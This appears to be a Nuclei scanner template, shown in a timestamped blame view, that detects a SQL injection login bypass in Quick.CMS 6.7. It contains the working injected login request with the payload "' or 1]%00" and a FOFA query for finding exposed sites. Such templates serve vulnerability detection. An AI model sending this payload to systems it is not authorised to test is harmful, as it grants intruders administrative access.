2024-03-21 15:37:28 +00:00
|
|
|
id: quick-cms-sqli
|
|
|
|
|
|
|
|
info:
|
2024-04-12 09:34:07 +00:00
|
|
|
name: Quick.CMS v6.7 - SQL Injection
|
2024-03-21 15:37:28 +00:00
|
|
|
author: Kazgangap
|
|
|
|
severity: high
|
2024-04-12 10:18:17 +00:00
|
|
|
description: |
|
|
|
|
Quick.CMS version 6.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
|
2024-03-21 15:37:28 +00:00
|
|
|
reference:
|
|
|
|
- https://packetstormsecurity.com/files/177657/Quick.CMS-6.7-SQL-Injection.html
|
|
|
|
- https://www.exploit-db.com/exploits/51910
|
2024-04-12 09:34:07 +00:00
|
|
|
metadata:
|
2024-04-12 10:18:17 +00:00
|
|
|
verified: true
|
2024-06-07 10:04:29 +00:00
|
|
|
max-request: 1
|
2024-04-12 09:34:07 +00:00
|
|
|
fofa-query: body="Quick.Cms v6.7"
|
|
|
|
tags: packetstorm,quickcms,sqli,cms
|
2024-03-21 15:37:28 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /admin.php?p=login HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
sEmail=test%40test.net&sPass=%27+or+1%5D%2500&bAcceptLicense=1&iAcceptLicense=true
|
|
|
|
|
|
|
|
host-redirects: true
|
2024-04-12 09:34:07 +00:00
|
|
|
max-redirects: 2
|
2024-03-21 15:37:28 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
2024-04-12 09:34:07 +00:00
|
|
|
- "Log out</a>"
|
|
|
|
- "Settings</a>"
|
|
|
|
- "Plugins</a>"
|
|
|
|
condition: and
|
2024-03-21 15:37:28 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-06-08 16:02:17 +00:00
|
|
|
# digest: 4b0a00483046022100e0516e26a3f113f7baf075eb8ba22bd554e173c1c2e2a50a15bee0e119e29ff4022100bfc6c593c2d9e033481dd30cd15592aa7b431364edf678d51cc9d9c343cf5ecd:922c64590222798bb761d5b6d8e72950
|